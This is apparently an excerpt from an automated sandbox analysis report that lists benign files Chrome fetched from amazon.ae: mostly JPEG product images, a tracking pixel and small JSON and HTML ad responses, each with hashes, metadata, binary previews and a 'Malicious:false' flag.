                                                                                                                                                                                                                                                                Preview:.... . ............... . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................ . . ............................................................... . . . . . . . .................. .. . . . . . . ........... ..................................................... ............................................................................................................................................. . ........................ ................................................ .............................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11226
                                                                                                                                                                                                                                                                Entropy (8bit):7.889421574582735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Y+xdKDWtCYFghY0PrSKrIdwLSAOP82dRiuTxs70FxHXwCM42DbTymm9kZ:fYxYFghb7JOPjXin70fHg7DCkZ
                                                                                                                                                                                                                                                                MD5:B71C330DA7B832FEDD32EE894DA6359D
                                                                                                                                                                                                                                                                SHA1:C406DA2D0920291CA6AAD71E9CE98D1092C3259B
                                                                                                                                                                                                                                                                SHA-256:6832010C124A2842EBB2439CC06E2379EBB86EF536952CF16D5B9F1A664592F4
                                                                                                                                                                                                                                                                SHA-512:06148C320B3C7FE6C27A2D383850D2FEE9AB92593EE94F81545B831F083C4FC79942A63275DD80785295D1BB7E6A3868D6A1F5441251A387B8289B50548A807B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x).}W.op.D..hOjl<...............z.}m.j|.oW........kQ5.....R.w.:r.........}o.U..]..@.......oZ.v..+.5a.P.......4|.K.b.B,...........Mzl...t.......G..>..a."...gB..\8x...<N3^..C9..>o.......\u.....hH.$..y...@...}o..`..,......=~Xc.>.zy....>Z..0...&...^...).......I.P......E.nh..C..........t..O..Z.#g...j.m..-U..W..............s{.{.........0.....?F..p....,0.{*.m.)r....S...k......j....H.......Ku............. ....i.N.WwKN,..4lC.3.c..p.&..]TG;.g^....S.U.Jt.T.5~.N.....{..v..X.~x....;..........e.F.?..3Z+./".8oy.95a...q.>..5.e......Y.2%.E1.u.].`S......k.........L0z....p\.gO...Z..-...N...P.1.=...qY..hp^.8.......p8..o&...C...N.........)WiO[.^......>w.......#..^x.H....Ev.Z..umq.G..5.#...%..8.g..:.u..}........|.5.4N.....1
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?at&v=0.294992.0&id=6NXZ98JFWKRECR4538X7&ctb=1&m=1&sc=6NXZ98JFWKRECR4538X7&pc=25970&at=25970&t=1723469120419&pty=zeitgeist&spty=bs&pti=undefined&tid=6NXZ98JFWKRECR4538X7&aftb=1&ui=2&lob=1
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):141607
                                                                                                                                                                                                                                                                Entropy (8bit):7.921386753935607
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:RA48loGc0kcoD6Od+3KC9apV58IOnu3Vj3z7t3SV7kRRuM+:RA9Vc0kcoD6U+3+V58ZnO3/t3SVARuM+
                                                                                                                                                                                                                                                                MD5:2311302CE6661577DF4BAD4418032BAA
                                                                                                                                                                                                                                                                SHA1:96470C1635A7CE5580C08E3308D5BF9E9F6D1E01
                                                                                                                                                                                                                                                                SHA-256:5C1F8B2D13ECB99261BC9DB377868B7D6CA994766A5E208E74BE5F09305419F2
                                                                                                                                                                                                                                                                SHA-512:2995D9E09EF2AF1E66D90E734D521491BEE2B9FA20A409191FFAF38704797DF6D93F5BC980DBE3748694D768CF8F8A642E8E9D28466DD00818E20C2F77A82177
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71hpd10GGkL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......#.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:2C8E13E14B5811EF8C44DC556605C1E6" xmpMM:DocumentID="xmp.did:2C8E13E24B5811EF8C44DC556605C1E6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2C8E13DF4B5811EF8C44DC556605C1E6" stRef:documentID="xmp.did:2C8E13E04B5811EF8C44DC556605C1E6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............z"..'...)%........................................... # ..))--))=;;;=@@@@@@@@@@......................!.....!
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2505
                                                                                                                                                                                                                                                                Entropy (8bit):7.57821258014142
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Q49FzEk6I87i/7btk9QTMYQuBBeCx+jkgfotZzVKOQ5J04/3JQA2v:/9hEkUi/ZMGJ3QJZwn
                                                                                                                                                                                                                                                                MD5:002622B77205566964885B74BF6DFED2
                                                                                                                                                                                                                                                                SHA1:5ADD68A03B70A9AB3C6942F7211CC81F413FDC9B
                                                                                                                                                                                                                                                                SHA-256:42EAAEC6B2FC15562C3616C2C1510B7C9F37E2FB6908C21956DCE1CA6076EAAC
                                                                                                                                                                                                                                                                SHA-512:5BF09C3AFB54BBD6ABB0C1B78796E79A5D6477BCD0D8756820990842F315A1CF30F1BCE0CDBA03A6326841ACD294EBCF7E5B4AE8F35FCF4AA9C69AD2313057BD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334875_186x116_1X_en_AE_4._SY116_CB597773556_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........8........................................................................7...........8s.t..F.....T..-.T......Dyo}.NFw......*...*.}n..)..=.).*....:..../F.O.........._...<Ye}....2...p.C...j.E....F...........UG..J..l.. ....q.r.-.u....<.Q........ .j...A.|-L.y${.....-...Q..Z.n8p......3?.o./D...h.t..X......._...............P.............................!.$1@EUa..%45ATdu......&DFPQeqv.........6GV..............?..c6.........oKY(...o...x...JD....3.-_hz.Ih...1....4j....>?L;.....l.U..S&.L..FC.}m..x~Y.-h.K_F)%M\.Z..\.......T^}}...7.}.j..=...B........$.....&......|.........nF6R.,5b..Q.M.8.uQ...ui......^........1.c\.."..M.nA..(L ..Z...7..j...m.&...........*...E.$.Gv.......Y..p@Bc...,...6("'.6...F.f.&..bH.+..Q....K..}#1..P...d%...m..O_/.s3..=C0..9..K.J~U.q]...~...........&..G...S.`....O...u}._.....)
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 145x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4153
                                                                                                                                                                                                                                                                Entropy (8bit):7.9021793482965785
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tw2NK/gd707BNuQamA4UAP8k9sk+K+wD1RCnOLw5Bz1YAKTgVeGd:ywhQaVtAEe+wD1E359sJGd
                                                                                                                                                                                                                                                                MD5:290026E2DF485F55AEA2263D4B84839E
                                                                                                                                                                                                                                                                SHA1:2190715A1C667AD0092A0B2324F3C2416A38A6C9
                                                                                                                                                                                                                                                                SHA-256:D2E8D5417E25B828E560613B2867D606317CD16CF1F7A8371D66D94D9CC88B7F
                                                                                                                                                                                                                                                                SHA-512:80B781B9FC7CB7D574C589894F162845DD313890D61C0000AA2084D507A3D478C9A3C6246289D3989D2355C9F6870FE86D32F26677CCC9E852414497BC3ECE54
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!."1AQ2aqt....#s....%5BRTbr........Scd...46C...............................................1A..!2.."QBR............?..Z...mZ....F`......J..vV[k....z....X..Q.r.<......*....w......&..m..$.Fk.?i.V...Z[.M=....="..]I..(..&L)".h.Kq...A.....g...5..&v..:X...kv..jU..z....&Fq...<..VzN........e.R[ki.....F...*Njk. ...y...s8.U)&.S.}.6......O...r.Z....-V.....">.".2'O.`UG=...y ....7V....s..........<.....N...-...oPM.<I.......9.zGx..."....Y$g...4.f..w...e..Sk.[h........}....."....9.....,...^I....:..>..nD.4..`.......U.S......../......@(cC.(~k..[n+5Os\=M..<.:../.i..".9..J..*..$.]<..D'8.....U..d.Z.?....V.....i...;X..9;..6O.j..5..z...%of.yA...q.Z.0;.Vr.......s.....q..M.E.p."....."0pE.j#...:...K....i.Rqi.......;i.91...H.$..0r....,y~..e..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4780
                                                                                                                                                                                                                                                                Entropy (8bit):5.127188812458324
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:IdNUzZqJcru09EbtGeSDOwrVay0uqYb40STfKAHSTfXAh4PpU:IszZgc609Ej+lrwyA84fKAAXAh4PpU
                                                                                                                                                                                                                                                                MD5:DB7834393CFC9730F70CFA5B292AE10F
                                                                                                                                                                                                                                                                SHA1:6BAB04266A60E301993D1FE4BEC9D77EE8B9677B
                                                                                                                                                                                                                                                                SHA-256:CBEFF4310F810093C2CAE3B876A893393F9E95941E2736A62F818280D3A3EBC7
                                                                                                                                                                                                                                                                SHA-512:89C000E24A38993E31455A9D41D8212618DA5258815830499E13AC00B33D326533B3FF328955CD7B8EE7A6F797E4A2C2D58ABC4E614C3E0AE7D87C42671541D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-right-7&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; top: 2px; right: 0px;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):50354
                                                                                                                                                                                                                                                                Entropy (8bit):7.969356113927722
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                                                                                MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                                                                                SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                                                                                SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                                                                                SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9745
                                                                                                                                                                                                                                                                Entropy (8bit):7.890971469578398
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:hj/axbXENOTuqGBuA2WI5RHj7tkbZRZMc/y7MtbNKlNDTtW1MEYpN:hmxb0NXuJDHtkbJ3bNoTzV
                                                                                                                                                                                                                                                                MD5:75D5FAA00E9D1DB019A02F883191A40A
                                                                                                                                                                                                                                                                SHA1:B405575930C9303B2C51165065B8E0F0956AFFCD
                                                                                                                                                                                                                                                                SHA-256:F3BAF125FC3630A94790075963C0C9F4B74160399D68A15B08FE02F4CE52EE75
                                                                                                                                                                                                                                                                SHA-512:86A04A2F19F47F5402BCB97636FE5E087D9A1D20B388F65CF097ED537BC2F03B46DAEB357E5E2695CF3F040EF58D6ECB631953A6506876C714B8E735F8FA8617
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................X.......'..^.../.s..c.(.}.....s...}...;.....|....v.;...nz...............}...=i..)..Dzfh."......E..7.|c.......l...>......?.+.{.s...............W5.Z.....W......C_..8.^GR8.6..xY\c1E..Q.n.....l.@....o.............u.........7.n..q..m.ij.jF..!.h....Umq.bQ+!tfy.*.b*...v...................oeu...w.ln..at.R..5..t..}...[OcP...'\../...e)h.j.........g..}...........~..~.U....in...a..TlWEqf.5.:6i.._.k..U\...S6o.7v4.2.Z..+.".}........{LpP.............<n..l.w8....[...lUEQf.5c..i...:&....U.2.u./..-......7k..F...#R..s...:........y......y.K...r.\U.rR.[..l.M.f.5#.6i.hli....FQ.8NK..76./.F.>...jfK..K.K....W..O..p.........?G.W{.._g...O<s.B.P..z*.7t.1.|..Fr.O...[.yr...,.z..:o>..n.....:....}.....mWMI-Ik-......<...............
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11083
                                                                                                                                                                                                                                                                Entropy (8bit):7.87657723281312
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:9O/y/Cw2A3csXw/Ul5R+wUG/hs6wN8fpsC3lpvywo7Bv3GZymJUjEvkmAgLm:3evCP+Bj+psC3ljoYymajEvbv6
                                                                                                                                                                                                                                                                MD5:7571B07878946CC6A4219CAC8350F465
                                                                                                                                                                                                                                                                SHA1:90B277E453A0CA3BE947BA06CF0AF9AE701466E1
                                                                                                                                                                                                                                                                SHA-256:2C667BCFA18A2A2E317D1E8628D14D192242ADE1833AAD6D26D2E48C783FE4CF
                                                                                                                                                                                                                                                                SHA-512:31CBCA4FA331C46635ABEB7D0DB1FCA8853D907FFBCB4564F8719C1D934E605D4B58115CC6765741015ECAE8506650AD609156B18FB1B5A6692E44C90DE709DE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/61YiMXsy7SL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........4.................................................................X......#N6...{9....S...L]..2...+.2...q&..}..:R..W.vK...T+.<.`.............:.....u/........k.-..?.:.....b........\{......F.9....Of.>-..G................dE9..{nc..v.6.Z.N.......rM.......s.."...t.b.9G..^.U8z%5u.............x...............6..m..._<=..h..b0.f....c..^gH>Z=.v..N.18....N.2..a6.p....'..................<..=o..._.9...H...<f.0..<..5.....SN.................;.In.@..n....E&..5&....5.~.......................C.}7....<......%...(.'.Jc=F.*..9.....................i........5G.}A..(Bf....+*..:.......................b..g.$b....;oRmio..5W.=U.[-.3hINW...~.ZU..c.#..............8k.o.."Q...r.......R\..w..|NgsTyO..Q...6...qI\Hh.P_..1..@P...........1.z.....N.0...j.q2...B/..,.o.[.f.)......A~...................4....b6M.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):813
                                                                                                                                                                                                                                                                Entropy (8bit):1.6642092553022059
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PvFvvF3fFvvvF3t/NvXvXvXvFvNvf1/3/VXvXvXvXvFvNvfV/dN/NvXvXvXvFvNn:eHFLinQPyn1zIXGvv3
                                                                                                                                                                                                                                                                MD5:021412A9D349D488D1500968D3A8E745
                                                                                                                                                                                                                                                                SHA1:457D01D5D9C8BAC326A4E59BA847B9EDBEDD18B5
                                                                                                                                                                                                                                                                SHA-256:E2390201730466B2899F8CFCC73C30C32E2891FC3ECC007DC9A8D63838E575F4
                                                                                                                                                                                                                                                                SHA-512:122B990D87026299F84626EA1D58324647BF4C92F632A9C661B7BD13BCCAFA739AA17C6A05FA7EFA73C441472E6859132E21B4EB79F95249B7659A9C23C87CCB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.. . . . ............................................................................................................................................................................................................................................... . . . . . ................ . . . . . . . ............................................................................................... ... . . . . . . . ........... .... . . . . . . . .................. . . . . . . . . ........... ................................................................................ ............{"prefetchSuppressionReason":"CheckoutPrefetch:prefetch-pipedata:ZeroCustomerId"}....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):12385
                                                                                                                                                                                                                                                                Entropy (8bit):7.930222705873263
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:dZbgNfsHO21xQISO1MtxGSwJ8rZ81bxoEMfUL:76sHnMIHYvwJ8rZ8bSEMsL
                                                                                                                                                                                                                                                                MD5:F0E83B1284679E3E36DABAB61110F84F
                                                                                                                                                                                                                                                                SHA1:0A95DD16A385CF48327566C4139E03E984B44346
                                                                                                                                                                                                                                                                SHA-256:45CA0AF4185367BBC3EC729BAC274E03CF29953C33D8C8472C9F789BE6BB50E3
                                                                                                                                                                                                                                                                SHA-512:1BF4BFD33A19E82E03763ED113BD136118CD8CF84769FE088B55AFF3F4BFB6BD7511E182F1ED7DF5D832EDD0D8BC1696B39D7DE23D983B066BC5499FB1B9FC51
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71tP2TMmkTL._AC_UL450_SR450,320_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5..................................................................X.....A....[.8....P..k..m~;...................j...|9.z.;...."^(................4s..F.GK....L....;..=u...[....q..k9.z.F.*}.C...4,...|.-/E..r.l.8;.............q>....E.L......9.M.....Q...{....T...i....;.m5......).~;..~..2<../.8.}...q............;z'_.......r\.F.e.R.}I.k.s.J....C3..9vG].O..Mw%..WX.....X..9..u._6.2.q..............z........;.....n.G.U......Z.\.=k..[..)w.7.sjB..o:W....N..............9.=.....^q.Z}.K.vM..s.~.....r...&B=BZ...9....7.%...b...|.w...<..-....>..9....7^...........6k..b..d....YO......"m.'..9..d.,.[J.m.}.>.<...b.......;....^V....B..=....Tr.......+.o+.J4.c...@...o.q................Fn.....5.i{.l.V..i....K...Y..M.].....F..qYkY4~Q.0Z..67!t..]z.y-.q5.2......6...<./.s...........T..\........-.6.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3362
                                                                                                                                                                                                                                                                Entropy (8bit):7.790232983607646
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:YAwgOoAWDtOD8+YaW8VmDtDku0MLpjvzv/6:YjwA2q8+VVytDeqvv/6
                                                                                                                                                                                                                                                                MD5:CBCFF75C6AE941CF0B90F4FA99A1DE2D
                                                                                                                                                                                                                                                                SHA1:CDBC945663B606E0817F0CCFF7D1AC6835E75145
                                                                                                                                                                                                                                                                SHA-256:BB2FABD3FC8B4CEDD82CD247D4F3FE73DF7A648E7F2A71AA8B844F42C2E3A11D
                                                                                                                                                                                                                                                                SHA-512:02683B00AE00396E5D4E7F5D74916DFBD1731FE208832DBA447F21A9E792F8731AB5F348F0EB8FC40ADBC000BF52E622E8AC234710AA1FAA7106F5C45F34F6C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................'...."..........0...................................................................T.I 'H*V..k..v..............H.9._....f.jB.c.4....o....[M...@.....3b..x..|.&.M.t~k:m....W./I5^..0.....;?-:..D........Z.<.9'....PW1f.5...D.^........................t>..?...-...............................!0."#6P $345.............Q.$....4y=<..i..2....$.......M\k.. .c....L+VG..S.q.{..M<.P..;...$5........Eg.,.7..&..@...9.0z...s..pR.r..Z../.....J2.....2..R..\K...A.l.Xz.Al.}h...^U.~A......E..8....W..A...+U..:...@._<.YUF.....e.).:............j^.[.*lj.t)7C..K!...Oo?..A~C....N....[Y....v..F...~...j|y.. u....x..........e.....NNw.;.[:.V.....V.....S_.~...vfy...6.G.....%."e......(....5..K..7 .x.-....4...^D.....3.)....|..Z.+..W....gK9..I.........n..C.?.../.........}k..a1..B.S...R....y....o."..f....o)W.'.:.3.d...?.s..B[.b..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D2669%26pc%3D27642%26at%3D27642%26t%3D1723469122091%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27642
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6057
                                                                                                                                                                                                                                                                Entropy (8bit):7.905647149495341
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tr469lRA4LeP1E05L0ObSJXX2ClUz60c/mutPP0BidFZ2Z5EIenACf2Uuty:n469ktQru60nutPP0U6EU+
                                                                                                                                                                                                                                                                MD5:319BC0474CACFA7129876AF3A5B0E735
                                                                                                                                                                                                                                                                SHA1:70370BC368E5C94546D0A9DFC8C4C151C495C32C
                                                                                                                                                                                                                                                                SHA-256:0CD55F15AA3C999C3112C97331897F32E4C8E2268D133A6DA6B9A8B56C984C9B
                                                                                                                                                                                                                                                                SHA-512:68706ADFD31432E60712D194EB47C9F7145010039015CC6C60A5CC2A5FC3649C9374614EA57F18CB27D54238AC171202F7769DC85373C92C91A30943A8E22648
                                                                                                                                                                                                                                                                Malicious:false
